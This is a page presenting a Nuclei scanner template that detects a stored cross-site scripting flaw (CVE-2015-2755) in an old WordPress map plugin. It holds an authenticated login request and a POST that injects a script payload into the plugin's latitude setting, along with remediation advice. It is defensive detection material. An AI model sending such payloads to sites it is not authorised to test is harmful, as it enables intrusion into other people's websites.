WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting

ID: CVE-2015-2755

Severity: medium

Author: r3Y3r53

Tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project

Description

WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.

YAML Source

id: CVE-2015-2755

info:
  name: WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
  remediation: |
    Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/131155/
    - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html
    - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html
    - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755
    - https://wordpress.org/plugins/ab-google-map-travel/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2015-2755
    cwe-id: CWE-352
    epss-score: 0.01828
    epss-percentile: 0.88216
    cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ab_google_map_travel_project
    product: ab_google_map_travel
    framework: wordpress
  tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")'
          - 'contains(body_2, "ab-google-map-travel")'
        condition: and
# digest: 490a004630440220477cbbbc3d19ddbc73781dacaa1e51cdf62b52f8a2ae3882065f99fbbf3cf77702206d7ed03c8938db7d10ba6d991a0ea0d3c3e523f56a8bd97da9f25a9a79de4526:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-2755.yaml"

View on Github